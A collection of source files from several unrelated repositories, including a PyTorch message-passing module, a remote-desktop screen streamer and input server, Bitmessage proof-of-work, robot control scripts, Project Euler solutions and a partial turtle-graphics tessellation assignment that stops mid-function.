mlp_dim : Scalar
Embedding dimension of hidden-state of LSTM
k : Scalar
Number of iterations of message passing
out_dim: Scalar
Dimension of resultant interaction vector
"""
def __init__(self, hidden_dim=128, mlp_dim=32, k=5, out_dim=None):
super(NMMP, self).__init__()
self.out_dim = out_dim or hidden_dim
self.hidden_embedding = torch.nn.Sequential(
torch.nn.Linear(hidden_dim, mlp_dim),
torch.nn.ReLU(),
)
self.mlp_dim = mlp_dim
self.node_to_edge_embedding = torch.nn.Linear(2*mlp_dim, mlp_dim)
self.edge_to_node_embedding = torch.nn.Linear(2*mlp_dim, mlp_dim)
self.out_projection = torch.nn.Linear(mlp_dim, self.out_dim)
self.k = k
def message_pass(self, node_embeddings):
# Perform a single iteration of message passing
n = node_embeddings.size(0)
arrange1 = node_embeddings.repeat(n, 1, 1) ## c
arrange2 = arrange1.transpose(0, 1) ## d
## e_out
e_out_all = torch.cat([arrange2, arrange1], dim=2)
e_out_neighbours = e_out_all[~torch.eye(n).bool()].reshape(n, n-1, 2*self.mlp_dim)
e_out_edges = self.node_to_edge_embedding(e_out_neighbours)
e_out_sumpool = torch.mean(e_out_edges, dim=1)
## e_in
e_in_all = torch.cat([arrange1, arrange2], dim=2)
e_in_neighbours = e_in_all[~torch.eye(n).bool()].reshape(n, n-1, 2*self.mlp_dim)
e_in_edges = self.node_to_edge_embedding(e_in_neighbours)
e_in_sumpool = torch.mean(e_in_edges, dim=1)
## [e_in; e_out]
concat_nodes = torch.cat([e_in_sumpool, e_out_sumpool], dim=1)
## refined node
refined_embeddings = self.edge_to_node_embedding(concat_nodes)
return refined_embeddings
def reset(self, _, device):
self.track_mask = None
def forward(self, hidden_states, _, obs2):
## If only primary present
num_tracks = obs2.size(0)
if num_tracks == 1:
return torch.zeros(1, self.out_dim, device=obs2.device)
## Embed hidden-state
node_embeddings = self.hidden_embedding(hidden_states)
## Iterative Message Passing
for _ in range(self.k):
node_embeddings = self.message_pass(node_embeddings)
return self.out_projection(node_embeddings)
``` |
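A hypothetical smoke test for `NMMP` (not from the original repository): three pedestrians' hidden states are refined by k rounds of message passing and projected to the interaction vector:
```python
import torch
nmmp = NMMP(hidden_dim=128, mlp_dim=32, k=5)
hidden_states = torch.randn(3, 128)  # LSTM hidden states of 3 pedestrians
obs2 = torch.randn(3, 2)             # current x-y positions (only the count is used)
interaction = nmmp(hidden_states, None, obs2)
print(interaction.shape)  # torch.Size([3, 128])
```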
{
"source": "josephGhobadi/irdc",
"score": 3
} |
#### File: josephGhobadi/irdc/FfmpegBinding.py
```python
import os
import platform
import subprocess
import screeninfo
class ffmpeg:
def __init__(self, port):
self.ffmpeg_command = ""
self.platform = platform.system()
self.current_file_address = os.path.dirname(os.path.abspath(__file__))
''' make commands '''
self.make_ffmpeg_command(port)
''' ffmpeg process '''
self.process = None
self.run_ffmpeg()
def make_ffmpeg_command(self, port):
ffmpeg_arguments = " -hide_banner -loglevel panic"
if self.platform == "Linux":
ffmpeg_arguments = ffmpeg_arguments + " -video_size "
ffmpeg_arguments = ffmpeg_arguments + str(screeninfo.get_monitors()[0].width) + "x"
ffmpeg_arguments = ffmpeg_arguments + str(screeninfo.get_monitors()[0].height)
ffmpeg_arguments = ffmpeg_arguments + " -f x11grab -i " + os.environ['DISPLAY'] + " "
        elif self.platform == "Windows":
            # gdigrab needs an input specifier; "desktop" captures the whole screen
            ffmpeg_arguments = ffmpeg_arguments + " -f gdigrab -i desktop "
ffmpeg_arguments = ffmpeg_arguments + "-framerate 15"
ffmpeg_arguments = ffmpeg_arguments + " -rtsp_transport tcp -f rtsp rtsp://localhost:" + str(port) + "/test"
if self.platform == "Linux":
self.ffmpeg_command = self.current_file_address + "/bin/unix/ffmpeg" + ffmpeg_arguments
elif self.platform == "Windows":
self.ffmpeg_command = self.current_file_address + "\\bin\\windows\\ffmpeg.exe" + ffmpeg_arguments
def check_alive(self):
try:
os.kill(self.process.pid, 0)
return True
except OSError:
return False
def run_ffmpeg(self):
self.process = subprocess.Popen(self.ffmpeg_command, shell=True,
stdin=None, stdout=None, stderr=None, close_fds=True)
def __del__(self):
self.process.kill()
```
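A hypothetical usage sketch (assumes the bundled ffmpeg binary exists under bin/ and an RTSP server is listening on the chosen port):
```python
streamer = ffmpeg(8554)  # starts capturing the screen and streaming to rtsp://localhost:8554/test
if streamer.check_alive():
    print("screen capture is running")
```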
#### File: josephGhobadi/irdc/WsCommandServer.py
```python
import asyncio
import json
import pyautogui
import websockets
class WsCommandServer:
    async def mouse_press(self, params):
        pyautogui.mouseDown(button=params["button"], x=params["x"], y=params["y"])
    async def mouse_release(self, params):
        pyautogui.mouseUp(button=params["button"], x=params["x"], y=params["y"])
    async def keyboard_press(self, params):
        pyautogui.keyDown(params['code'])
    async def keyboard_release(self, params):
        pyautogui.keyUp(params['code'])  # keyUp releases the key; keyDown would leave it held
async def commands_switch(self, websocket, path):
async for message in websocket:
data = json.loads(message)
            class_methods = [name for name in dir(WsCommandServer) if callable(getattr(WsCommandServer, name)) and '__' not in name]
if data["command"] in class_methods:
func = getattr(self, data["command"])
await func(data["params"])
else:
print("unrecognizable action!")
def run_ws_server():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(
websockets.serve(WsCommandServer().commands_switch, 'localhost', 1553))
asyncio.get_event_loop().run_forever()
``` |
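A hypothetical client for `WsCommandServer` (not part of the original repository): it connects to the port opened by `run_ws_server` and sends one `mouse_press` command in the JSON shape that `commands_switch` dispatches on:
```python
import asyncio
import json
import websockets
async def send_click():
    async with websockets.connect('ws://localhost:1553') as ws:
        await ws.send(json.dumps({
            "command": "mouse_press",
            "params": {"button": "left", "x": 100, "y": 200},
        }))
asyncio.get_event_loop().run_until_complete(send_click())
```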
{
"source": "josephglanville/confluent-kafka-python",
"score": 3
} |
#### File: avro/serializer/__init__.py
```python
class SerializerError(Exception):
"""Generic error from serializer package"""
def __init__(self, message):
self.message = message
def __repr__(self):
return '{klass}(error={error})'.format(
klass=self.__class__.__name__,
error=self.message
)
def __str__(self):
return self.message
class KeySerializerError(SerializerError):
pass
class ValueSerializerError(SerializerError):
pass
``` |
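A brief usage sketch of the error hierarchy above (illustrative, not from the repository):
```python
try:
    raise KeySerializerError("bad key schema")
except SerializerError as err:
    print(repr(err))  # KeySerializerError(error=bad key schema)
```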
{
"source": "JosephGoulden/PyBitmessageF2F",
"score": 2
} |
#### File: PyBitmessageF2F/src/proofofwork.py
```python
import hashlib
from struct import unpack, pack
import sys
from shared import config, frozen
import shared
#import os
def _set_idle():
if 'linux' in sys.platform:
import os
os.nice(20) # @UndefinedVariable
else:
try:
sys.getwindowsversion()
import win32api,win32process,win32con # @UnresolvedImport
pid = win32api.GetCurrentProcessId()
handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, pid)
win32process.SetPriorityClass(handle, win32process.IDLE_PRIORITY_CLASS)
except:
#Windows 64-bit
pass
def _pool_worker(nonce, initialHash, target, pool_size):
_set_idle()
trialValue = float('inf')
while trialValue > target:
nonce += pool_size
trialValue, = unpack('>Q',hashlib.sha512(hashlib.sha512(pack('>Q',nonce) + initialHash).digest()).digest()[0:8])
return [trialValue, nonce]
def _doSafePoW(target, initialHash):
nonce = 0
trialValue = float('inf')
while trialValue > target:
nonce += 1
trialValue, = unpack('>Q',hashlib.sha512(hashlib.sha512(pack('>Q',nonce) + initialHash).digest()).digest()[0:8])
return [trialValue, nonce]
def _doFastPoW(target, initialHash):
import time
from multiprocessing import Pool, cpu_count
try:
pool_size = cpu_count()
except:
pool_size = 4
try:
maxCores = config.getint('bitmessagesettings', 'maxcores')
except:
maxCores = 99999
if pool_size > maxCores:
pool_size = maxCores
pool = Pool(processes=pool_size)
result = []
for i in range(pool_size):
result.append(pool.apply_async(_pool_worker, args = (i, initialHash, target, pool_size)))
while True:
if shared.shutdown >= 1:
pool.terminate()
while True:
time.sleep(10) # Don't let this thread return here; it will return nothing and cause an exception in bitmessagemain.py
return
for i in range(pool_size):
if result[i].ready():
result = result[i].get()
pool.terminate()
pool.join() #Wait for the workers to exit...
return result[0], result[1]
time.sleep(0.2)
def run(target, initialHash):
target = int(target)
if frozen == "macosx_app" or not frozen:
return _doFastPoW(target, initialHash)
else:
return _doSafePoW(target, initialHash)
``` |
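The search loops above accept a nonce once its double-SHA512 trial value drops to the target or below; a sketch of the matching verification step (a hypothetical helper, not part of the original module):
```python
import hashlib
from struct import pack, unpack
def verify(target, initial_hash, nonce):
    # Recompute the trial value exactly as the workers above do
    digest = hashlib.sha512(hashlib.sha512(pack('>Q', nonce) + initial_hash).digest()).digest()
    trial_value, = unpack('>Q', digest[0:8])
    return trial_value <= target
```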
{
"source": "JosephGregg/robotstreamer",
"score": 3
} |
#### File: JosephGregg/robotstreamer/gopigo_interface.py
```python
import sys
import time
import gopigo
import robot_util
def handleCommand(command, keyPosition):
# only uses pressing down of keys
if keyPosition != "down":
return
print("handle command", command, keyPosition)
if command == 'L':
gopigo.left_rot()
time.sleep(0.15)
gopigo.stop()
if command == 'R':
gopigo.right_rot()
time.sleep(0.15)
gopigo.stop()
if command == 'F':
gopigo.forward()
time.sleep(0.4)
gopigo.stop()
if command == 'B':
gopigo.backward()
time.sleep(0.3)
gopigo.stop()
robot_util.handleSoundCommand(command, keyPosition)
```
#### File: robotstreamer/player/player.py
```python
import os
import asyncio
import websockets
import time
import argparse
import json
import _thread
import traceback
import subprocess
import urllib
import urllib.request
config = json.load(open('config.json'))
userID = "26"
chatEndpoint = {'host': '192.168.3.11', 'port': 8765}
parser = argparse.ArgumentParser(description='robotstreamer chat bot')
commandArgs = parser.parse_args()
def jsonResponsePOST(url, jsonObject):
print("json object to POST", jsonObject)
params = json.dumps(jsonObject).encode('utf8')
req = urllib.request.Request(url, data=params,
headers={'content-type': 'application/json'})
response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
print("response:", jsonResponse)
return jsonResponse
async def handleStatusMessages():
global mainWebsocket
print("running handle status messages")
url = 'ws://%s:%s' % (chatEndpoint['host'], chatEndpoint['port'])
print("chat url:", url)
async with websockets.connect(url) as websocket:
mainWebsocket = websocket
print("connected to service at", url)
print("chat websocket object:", websocket)
print("starting websocket.send")
#await websocket.send(json.dumps({"type":"connect",
# "robot_id":1,
# "local_address":"1"}))
while True:
print("awaiting message, this is optional (Ctrl-Break in Windows to Break)")
message = await websocket.recv()
print("received message:", message)
async def handleUpdateMessages():
global mainWebsocket
count = 0
print("start update")
while True:
time.sleep(2)
print("sending")
m = "!play https://youtubewhatever to play a song"
if count % 2 == 0:
m = m + " "
print("message to send:", m)
await mainWebsocket.send(json.dumps({"message": m,
"token": config['jwt_user_token']}))
count += 1
time.sleep(160*5)
def startStatus():
print("starting status")
try:
asyncio.new_event_loop().run_until_complete(handleStatusMessages())
except:
print("error")
traceback.print_exc()
def startUpdateMessages():
    print("starting update messages")
try:
asyncio.new_event_loop().run_until_complete(handleUpdateMessages())
except:
print("error")
traceback.print_exc()
def main():
print(commandArgs)
print("starting chat bot")
_thread.start_new_thread(startStatus, ())
_thread.start_new_thread(startUpdateMessages, ())
# wait forever
while True:
time.sleep(5)
if __name__ == '__main__':
main()
```
#### File: JosephGregg/robotstreamer/vibrate.py
```python
from math import sin
from robot_util import times
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor
import time
vibrateSystemActive = False
def setMotorSpeed(mh, motorIndex, direction, s):
motor = mh.getMotor(motorIndex+1)
#print("direction", direction)
if direction == 1:
motor.setSpeed(s)
motor.run(Adafruit_MotorHAT.FORWARD)
if direction == -1:
motor.setSpeed(s)
motor.run(Adafruit_MotorHAT.BACKWARD)
def vibrate(mh, forwardDefinition):
global vibrateSystemActive
if vibrateSystemActive:
print("skip")
else:
vibrateSystemActive = True
for i in range(60):
            a = float(i)  # phase in radians, one radian per step
            speed = int(sin(a) * 255.0)
print("speed", speed)
if speed >= 0:
directions = forwardDefinition
else:
directions = times(forwardDefinition, -1)
speed = -speed
print(speed, directions)
for motorIndex in range(4):
setMotorSpeed(mh,
motorIndex,
directions[motorIndex],
speed)
time.sleep(0.05)
turnOffMotors(mh)
vibrateSystemActive = False
#todo: this function should be in a file shared by this and rsbot
def turnOffMotors(mh):
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
def main():
mh = Adafruit_MotorHAT(addr=0x60)
vibrate(mh, [-1,1,-1,1])
if __name__ == "__main__":
main()
``` |
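A standalone sketch of the sinusoidal speed schedule inside `vibrate` (illustrative; `times(forwardDefinition, -1)` from robot_util is replaced by an inline negation):
```python
from math import sin
forward = [-1, 1, -1, 1]
for i in range(5):
    s = int(sin(float(i)) * 255.0)
    directions = forward if s >= 0 else [-d for d in forward]
    print(abs(s), directions)  # magnitude 0..255 and per-motor direction
```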
{
"source": "josephhaddad55/project-euler",
"score": 4
} |
#### File: josephhaddad55/project-euler/euler1.py
```python
def find_sum_multiples(n: int, first_multiple: int, second_multiple: int) -> int:
result = 0
for i in range(0, n):
if i % first_multiple == 0 or i % second_multiple == 0:
result += i
return result
if __name__ == "__main__":
assert find_sum_multiples(1000, 3, 5) == 233168
```
#### File: josephhaddad55/project-euler/euler2.py
```python
def find_even_sum_fib() -> int:
a, b = 1, 2
result = 0
while b < 4e6:
if b % 2 == 0:
result += b
b = a + b
a = b - a
return result
if __name__ == "__main__":
assert find_even_sum_fib() == 4613732
``` |
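The loop in euler1.py runs in O(n); the same answer follows in O(1) from the arithmetic-series sum with inclusion-exclusion (a sketch, not part of the original solutions):
```python
def sum_divisible_by(k: int, below: int) -> int:
    m = (below - 1) // k          # number of positive multiples of k below `below`
    return k * m * (m + 1) // 2   # k * (1 + 2 + ... + m)
# Multiples of 3 or 5 below 1000: add both series, subtract double-counted multiples of 15.
assert sum_divisible_by(3, 1000) + sum_divisible_by(5, 1000) - sum_divisible_by(15, 1000) == 233168
```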
{
"source": "josephhaddad55/supreme-waddle-ocr",
"score": 3
} |
#### File: josephhaddad55/supreme-waddle-ocr/read.py
```python
import time
from PIL import Image
from pytesseract import image_to_string
def read_image():
# Log the time
time_start = time.time()
# Object to capture results
text_from_image = {}
# Try to read the image
try:
print("Reading image ...\n")
text_from_image = image_to_string(
Image.open("./dump-ticket.jpeg"),
lang="eng",
config="",
nice=0,
output_type="dict",
)
except Exception as e:
print(e)
print(f"It took {time.time() - time_start} seconds for conversion. \n")
return text_from_image
if __name__ == "__main__":
print(read_image())
``` |
{
"source": "Joseph-Haddad/Joseph-Haddad-Portfolio",
"score": 3
} |
#### File: Joseph-Haddad/Joseph-Haddad-Portfolio/tessellation.py
```python
from turtle import *
from math import *
from random import *
# Define constant values used in the main program that sets up
# the drawing canvas. Do not change any of these values.
cell_size = 100 # pixels (default is 100)
grid_width = 10 # squares (default is 10)
grid_height = 7 # squares (default is 7)
x_margin = cell_size * 2.75 # pixels, the size of the margin left/right of the grid
y_margin = cell_size // 2 # pixels, the size of the margin below/above the grid
window_height = grid_height * cell_size + y_margin * 2
window_width = grid_width * cell_size + x_margin * 2
small_font = ('Arial', 18, 'normal') # font for the coords
big_font = ('Arial', 24, 'normal') # font for any other text
# Validity checks on grid size - do not change this code
assert cell_size >= 80, 'Cells must be at least 80x80 pixels in size'
assert grid_width >= 8, 'Grid must be at least 8 squares wide'
assert grid_height >= 6, 'Grid must be at least 6 squares high'
#
#--------------------------------------------------------------------#
#-----Functions for Creating the Drawing Canvas----------------------#
#
# The functions in this section are called by the main program to
# manage the drawing canvas for your image. You should not change
# any of the code in this section.
#
# Set up the canvas and draw the background for the overall image
def create_drawing_canvas(bg_colour = 'light blue',
line_colour = 'slate grey',
draw_grid = True, mark_legend = False):
# Set up the drawing canvas with enough space for the grid and
# legend
setup(window_width, window_height)
bgcolor(bg_colour)
# Draw as quickly as possible
tracer(False)
# Get ready to draw the grid
penup()
color(line_colour)
width(2)
# Determine the left-bottom coords of the grid
left_edge = -(grid_width * cell_size) // 2
bottom_edge = -(grid_height * cell_size) // 2
# Optionally draw the grid
if draw_grid:
# Draw the horizontal grid lines
setheading(0) # face east
for line_no in range(0, grid_height + 1):
penup()
goto(left_edge, bottom_edge + line_no * cell_size)
pendown()
forward(grid_width * cell_size)
# Draw the vertical grid lines
setheading(90) # face north
for line_no in range(0, grid_width + 1):
penup()
goto(left_edge + line_no * cell_size, bottom_edge)
pendown()
forward(grid_height * cell_size)
# Draw each of the labels on the x axis
penup()
y_offset = 27 # pixels
for x_label in range(0, grid_width):
goto(left_edge + (x_label * cell_size) + (cell_size // 2), bottom_edge - y_offset)
write(chr(x_label + ord('A')), align = 'center', font = small_font)
# Draw each of the labels on the y axis
penup()
x_offset, y_offset = 7, 10 # pixels
for y_label in range(0, grid_height):
goto(left_edge - x_offset, bottom_edge + (y_label * cell_size) + (cell_size // 2) - y_offset)
write(str(y_label + 1), align = 'right', font = small_font)
# Mark centre coordinate (0, 0)
home()
dot(15)
# Optionally mark the spaces for drawing the legend
if mark_legend:
# Left side
goto(-(grid_width * cell_size) // 2 - 75, -25)
write('Put your\nlegend here', align = 'right', font = big_font)
# Right side
goto((grid_width * cell_size) // 2 + 75, -25)
write('Put your\nlegend here', align = 'left', font = big_font)
# Reset everything ready for the student's solution
pencolor('black')
width(1)
penup()
home()
tracer(True)
# End the program and release the drawing canvas to the operating
# system. By default the cursor (turtle) is hidden when the
# program ends - call the function with False as the argument to
# prevent this.
def release_drawing_canvas(hide_cursor = True):
tracer(True) # ensure any drawing still in progress is displayed
if hide_cursor:
hideturtle()
done()
#
#--------------------------------------------------------------------#
#-----Test Data for Use During Code Development----------------------#
#
# The "fixed" data sets in this section are provided to help you
# develop and test your code. You can use them as the argument to
# the "tesselate" function while perfecting your solution. However,
# they will NOT be used to assess your program. Your solution will
# be assessed using the "random_pattern" function appearing below.
# Your program must work correctly for any data set that can be
# generated by the random_pattern function.
#
# Each of the data sets is a list of instructions, each specifying
# where to place a particular tile. The general form of each
# instruction is
#
# [squares, mystery_value]
#
# where there may be one, two or four squares in the grid listed
# at the beginning. This tells us which grid squares must be
# filled by this particular tile. This information also tells
# us which shape of tile to produce. A "big" tile will occupy
# four grid squares, a "small" tile will occupy one square, a
# "wide" tile will occupy two squares in the same row, and a
# "tall" tile will occupy two squares in the same column. The
# purpose of the "mystery value" will be revealed in Part B of
# the assignment.
#
# Note that the fixed patterns below assume the grid has its
# default size of 10x7 squares.
#
# Some starting points - the following fixed patterns place
# just a single tile in the grid, in one of the corners.
# Small tile
fixed_pattern_0 = [['A1', 'O']]
fixed_pattern_1 = [['J7', 'X']]
# Wide tile
fixed_pattern_2 = [['A7', 'B7', 'O']]
fixed_pattern_3 = [['I1', 'J1', 'X']]
# Tall tile
fixed_pattern_4 = [['A1', 'A2', 'O']]
fixed_pattern_5 = [['J6', 'J7', 'X']]
# Big tile
fixed_pattern_6 = [['A6', 'B6', 'A7', 'B7', 'O']]
fixed_pattern_7 = [['I1', 'J1', 'I2', 'J2', 'X']]
# Each of these patterns puts multiple copies of the same
# type of tile in the grid.
# Small tiles
fixed_pattern_8 = [['E1', 'O'],
['J4', 'O'],
['C5', 'O'],
['B1', 'O'],
['I1', 'O']]
fixed_pattern_9 = [['C6', 'X'],
['I4', 'X'],
['D6', 'X'],
['J5', 'X'],
['F6', 'X'],
['F7', 'X']]
# Wide tiles
fixed_pattern_10 = [['A4', 'B4', 'O'],
['C1', 'D1', 'O'],
['C7', 'D7', 'O'],
['A7', 'B7', 'O'],
['D4', 'E4', 'O']]
fixed_pattern_11 = [['D7', 'E7', 'X'],
['G7', 'H7', 'X'],
['H5', 'I5', 'X'],
['B3', 'C3', 'X']]
# Tall tiles
fixed_pattern_12 = [['J2', 'J3', 'O'],
['E5', 'E6', 'O'],
['I1', 'I2', 'O'],
['E1', 'E2', 'O'],
['D3', 'D4', 'O']]
fixed_pattern_13 = [['H4', 'H5', 'X'],
['F1', 'F2', 'X'],
['E2', 'E3', 'X'],
['C4', 'C5', 'X']]
# Big tiles
fixed_pattern_14 = [['E5', 'F5', 'E6', 'F6', 'O'],
['I5', 'J5', 'I6', 'J6', 'O'],
['C2', 'D2', 'C3', 'D3', 'O'],
['H2', 'I2', 'H3', 'I3', 'O'],
['A3', 'B3', 'A4', 'B4', 'O']]
fixed_pattern_15 = [['G2', 'H2', 'G3', 'H3', 'X'],
['E5', 'F5', 'E6', 'F6', 'X'],
['E3', 'F3', 'E4', 'F4', 'X'],
['B3', 'C3', 'B4', 'C4', 'X']]
# Each of these patterns puts one instance of each type
# of tile in the grid.
fixed_pattern_16 = [['I5', 'O'],
['E1', 'F1', 'E2', 'F2', 'O'],
['J5', 'J6', 'O'],
['G7', 'H7', 'O']]
fixed_pattern_17 = [['G7', 'H7', 'X'],
['B7', 'X'],
['A5', 'B5', 'A6', 'B6', 'X'],
['D2', 'D3', 'X']]
# If you want to create your own test data sets put them here,
# otherwise call function random_pattern to obtain data sets
# that fill the entire grid with tiles.
#
#--------------------------------------------------------------------#
#-----Function for Assessing Your Solution---------------------------#
#
# The function in this section will be used to assess your solution.
# Do not change any of the code in this section.
#
# The following function creates a random data set specifying a
# tessellation to draw. Your program must work for any data set that
# can be returned by this function. The results returned by calling
# this function will be used as the argument to your "tessellate"
# function during marking. For convenience during code development
# and marking this function also prints the pattern to be drawn to the
# shell window. NB: Your solution should not print anything else to
# the shell. Make sure any debugging calls to the "print" function
# are disabled before you submit your solution.
#
# This function attempts to place tiles using a largest-to-smallest
# greedy algorithm. However, it randomises the placement of the
# tiles and makes no attempt to avoid trying the same location more
# than once, so it's not very efficient and doesn't maximise the
# number of larger tiles placed. In the worst case, only one big
# tile will be placed in the grid (but this is very unlikely)!
#
# As well as the coordinates for each tile, an additional value which
# is either an 'O' or 'X' accompanies each one. The purpose of this
# "mystery" value will be revealed in Part B of the assignment.
#
def random_pattern(print_pattern = True):
# Keep track of squares already occupied
been_there = []
# Initialise the pattern
pattern = []
# Percent chance of the mystery value being an X
mystery_probability = 8
# Attempt to place as many 2x2 tiles as possible, up to a fixed limit
attempts = 10
while attempts > 0:
# Choose a random bottom-left location
column = randint(0, grid_width - 2)
row = randint(0, grid_height - 2)
# Try to place the tile there, provided the spaces are all free
if (not [column, row] in been_there) and \
(not [column, row + 1] in been_there) and \
(not [column + 1, row] in been_there) and \
(not [column + 1, row + 1] in been_there):
been_there = been_there + [[column, row], [column, row + 1],
[column + 1, row], [column + 1, row + 1]]
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
chr(column + ord('A') + 1) + str(row + 1),
chr(column + ord('A')) + str(row + 2),
chr(column + ord('A') + 1) + str(row + 2),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Keep track of the number of attempts
attempts = attempts - 1
# Attempt to place as many 1x2 tiles as possible, up to a fixed limit
attempts = 15
while attempts > 0:
# Choose a random bottom-left location
column = randint(0, grid_width - 1)
row = randint(0, grid_height - 2)
# Try to place the tile there, provided the spaces are both free
if (not [column, row] in been_there) and \
(not [column, row + 1] in been_there):
been_there = been_there + [[column, row], [column, row + 1]]
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
chr(column + ord('A')) + str(row + 2),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Keep track of the number of attempts
attempts = attempts - 1
# Attempt to place as many 2x1 tiles as possible, up to a fixed limit
attempts = 20
while attempts > 0:
# Choose a random bottom-left location
column = randint(0, grid_width - 2)
row = randint(0, grid_height - 1)
# Try to place the tile there, provided the spaces are both free
if (not [column, row] in been_there) and \
(not [column + 1, row] in been_there):
been_there = been_there + [[column, row], [column + 1, row]]
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
chr(column + ord('A') + 1) + str(row + 1),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Keep track of the number of attempts
attempts = attempts - 1
# Fill all remaining spaces with 1x1 tiles
for column in range(0, grid_width):
for row in range(0, grid_height):
if not [column, row] in been_there:
been_there.append([column, row])
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Remove any residual structure in the pattern
shuffle(pattern)
# Print the pattern to the shell window, nicely laid out
print('Draw the tiles in this sequence:')
print(str(pattern).replace('],', '],\n'))
# Return the tessellation pattern
return pattern
#
#--------------------------------------------------------------------#
#-----Student's Solution---------------------------------------------#
#
# Complete the assignment by replacing the dummy function below with
# your own "tessellate" function.
#
def two_by_two(): ### Red
### Draw the outer rectangle
setheading(0)
width(3)
fillcolor('steel blue')
begin_fill()
pendown()
forward(200)
left(90)
forward(200)
left(90)
forward(200)
left(90)
forward(200)
end_fill()
penup()
### Outer black circle
setheading(0)
forward(100)
left(90)
forward(100)
pencolor('black')
dot(170)
left(180)
forward(100)
right(90)
forward(100)
setheading(270)
# Positioning of the body
forward(-120)
right(90)
forward(-60)
left(90)
### Main body of bird
width(5)
fillcolor('Firebrick')
begin_fill()
pendown()
right(45)
circle(60, extent = 270)
right(45)
circle(50, extent = 70)
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 40 )
right(190)
circle(50, extent = 60 )
left(30)
circle(50, extent = 20 )
left(30)
circle(50, extent = 20 )
left(70)
forward(10)
end_fill()
penup()
width(3)
### Positioning
forward(70)
### Eye brows
fillcolor('black')
begin_fill()
pendown()
right(140)
forward(30)
right(60)
forward(30)
left(80)
forward(10)
left(105)
forward(35)
left(50)
forward(35)
left(80)
forward(10)
end_fill()
penup()
    ### Positioning
forward(3)
right(90)
forward(-56)
left(90)
### Left eye
fillcolor('white')
begin_fill()
pendown()
left(100)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
### Positioning
right(90)
forward(10)
left(90)
### Right eye
pendown()
fillcolor('white')
begin_fill()
pendown()
left(175)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
    ### Positioning
setheading(180)
forward(9)
left(90)
forward(15)
#### Right eye dot
pendown()
dot(10)
penup()
    ### Positioning
setheading(180)
forward(35)
left(90)
forward(-4)
### Left eye dot
pendown()
dot(10)
penup()
### Positioning
setheading(270)
forward(50)
setheading(0)
forward(57)
setheading(90)
### White belly section
fillcolor('wheat')
begin_fill()
pendown()
left(50)
circle(50, extent = 94)
setheading(0)
right(38)
circle(50, extent = 94)
end_fill()
penup()
### Positioning
left(90)
forward(70)
right(90)
right(30)
forward(18)
left(30)
### Beak
width(3)
fillcolor('Orange')
begin_fill()
pendown()
left(170)
circle(50, extent = 30)
left(120)
forward(30)
left(120)
forward(25)
end_fill()
penup()
### Positioning
setheading(270)
forward(22)
### Bottom part of beak
width(2)
fillcolor('Dark Orange')
begin_fill()
pendown()
left(45)
forward(10)
left(100)
forward(12)
left(135)
forward(12)
end_fill()
penup()
def one_by_one(): ### Yellow
### Tile outline
setheading(0)
pendown()
setheading(0)
width(3)
pencolor('black')
fillcolor('beige')
begin_fill()
forward(100)
left(90)
forward(100)
left(90)
forward(100)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(20)
left(90)
forward(10)
### Chucks body
width(3)
fillcolor('yellow')
begin_fill()
pendown()
right(100)
circle(200, extent = 20)
left(90)
circle(200, extent = 20)
left(100)
circle(200, extent = 24)
left(120)
forward(5)
end_fill()
### Positioning
penup()
setheading(0)
forward(50)
left(90)
forward(60)
### Spiky Hair
fillcolor('black')
begin_fill()
pendown()
right(50)
circle(20, extent = 70)
right(220)
forward(10)
right(110)
circle(30, extent = 40)
left(120)
forward(15)
right(150)
circle(30, extent = 40)
left(130)
forward(20)
end_fill()
### Positioning
penup()
setheading(0)
right(90)
forward(25)
right(90)
forward(5)
### Eyes
penup()
right(90)
forward(-8)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
right(90)
forward(20)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
### Positioning
left(180)
forward(20)
left(90)
forward(12)
left(100)
### Beak
fillcolor('orange')
begin_fill()
pendown()
width(2)
forward(15)
right(20)
forward(15)
setheading(180)
left(10)
forward(10)
left(90)
forward(10)
left(10)
forward(10)
setheading(180)
right(40)
forward(32)
end_fill()
### Positioning
penup()
setheading(180)
forward(9)
setheading(90)
forward(25)
### Left eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
### Positioning
penup()
setheading(0)
forward(20)
setheading(90)
forward(5)
setheading(0)
### Right eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
penup()
def horizontal(): ### Bad Piggie
### Tile outline
setheading(0)
fillcolor('sandy brown')
begin_fill()
width(3)
pendown()
forward(200)
left(90)
forward(100)
left(90)
forward(200)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(100)
setheading(90)
forward(5)
### Body
pencolor('dark green')
fillcolor('lawn green')
begin_fill()
pendown()
setheading(0)
circle(40)
end_fill()
### Ears
penup()
circle(40, extent = 130)
pendown()
fillcolor('lawn green')
begin_fill()
circle(-10)
end_fill()
penup()
circle(40, extent = 90)
pendown()
fillcolor('lawn green')
begin_fill()
